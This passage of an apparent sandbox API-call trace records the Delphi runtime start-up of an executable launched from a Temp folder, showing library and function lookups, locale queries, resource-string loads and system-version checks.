lpProcName="SysReAllocStringLen") returned 0x76c17810 [0112.684] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0112.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0112.685] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0112.685] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0112.685] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0112.685] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0112.685] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0112.685] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0112.685] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0112.685] SetThreadLocale (Locale=0x400) returned 1 [0112.686] GetVersion () returned 0x1db10106 [0112.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0112.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0112.686] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.686] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0112.686] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0112.686] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.686] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0112.686] GetACP () returned 0x4e4 [0112.686] GetCurrentThreadId () returned 0xd84 [0112.686] GetVersion () returned 0x1db10106 [0112.686] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x211cb8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.687] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.687] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.687] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0112.687] GetUserDefaultUILanguage () returned 0x409 [0112.688] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0112.688] GetThreadUILanguage () returned 0x120409 [0112.688] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0112.688] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] GetUserDefaultUILanguage () returned 0x409 [0112.689] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.689] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0112.690] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0112.691] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.691] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0112.691] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x224440 [0112.691] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0112.691] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0112.691] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0112.691] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0112.691] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0112.691] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0112.691] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0112.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0112.691] GetThreadLocale () returned 0x409 [0112.692] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0112.692] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0112.692] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.692] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0112.692] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0112.692] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x224450 [0112.692] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0112.692] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0112.692] GetLastError () returned 0x7a [0112.692] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0112.692] GetCurrentThreadId () returned 0xd84 [0112.692] GetCurrentThreadId () returned 0xd84 [0112.692] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0112.692] GetThreadLocale () returned 0x409 [0112.692] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0112.693] GetThreadLocale () returned 0x409 [0112.693] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0112.693] GetCurrentThreadId () returned 0xd84 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0112.693] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0112.694] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0112.694] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0112.694] GetProcAddress (hModule=0x76c10000, 